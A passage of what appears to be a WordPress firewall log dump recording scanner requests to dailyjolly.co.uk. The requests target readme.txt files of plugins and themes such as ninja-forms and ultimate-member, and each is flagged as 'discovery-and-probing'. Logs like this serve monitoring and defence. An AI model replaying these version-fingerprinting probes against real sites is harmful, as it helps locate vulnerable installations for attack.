scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12523,1674983041.351897,1674983041.229600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12524,1674983025.595715,1674983025.464200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12525,1674983025.595608,1674983025.464200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/membership-for-woocommerce/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLWZvci13b29jb21tZXJjZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12526,1674983073.486552,1674983073.362800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12527,1674983073.486435,1674983073.362800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12528,1674983041.973550,1674983041.864600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12529,1674983041.973442,1674983041.864600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ninja-forms/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Mobile Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uaW5qYS1mb3Jtcy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12530,1674983085.808112,1674983085.685600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12531,1674983085.807995,1674983085.685600,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12532,1674983074.231931,1674983074.122200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12533,1674983074.231823,1674983074.122200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/capabilities-pro/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jYXBhYmlsaXRpZXMtcHJvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12534,1674983097.480973,1674983097.358800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12535,1674983097.480857,1674983097.358800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12536,1674983086.456669,1674983086.348100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12537,1674983086.456561,1674983086.348100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/vc-tabs/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy92Yy10YWJzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12538,1674983113.945800,1674983113.824200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12539,1674983113.945685,1674983113.824200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12540,1674983103.482515,1674983103.375100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12541,1674983103.482419,1674983103.375100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12542,1674983103.189094,1674983103.068700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12543,1674983103.188982,1674983103.068700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/listingo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2xpc3RpbmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12544,1674983098.123655,1674983098.016100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12545,1674983098.123547,1674983098.016100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYXN0ZXJzdHVkeS1sbXMtbGVhcm5pbmctbWFuYWdlbWVudC1zeXN0ZW0vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12546,1674983125.981588,1674983125.862200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12547,1674983125.981474,1674983125.862200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12548,1674983120.395976,1674983120.288100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12549,1674983120.395877,1674983120.288100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12550,1674983120.101798,1674983119.939000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12551,1674983120.101646,1674983119.939000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/ultimate-member/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12552,1674983114.741667,1674983114.614800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12553,1674983114.741556,1674983114.614800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-shortcodes/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1zaG9ydGNvZGVzL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12554,1674983126.664845,1674983126.556300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12555,1674983126.664738,1674983126.556300,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-upg/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11cGcvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}');
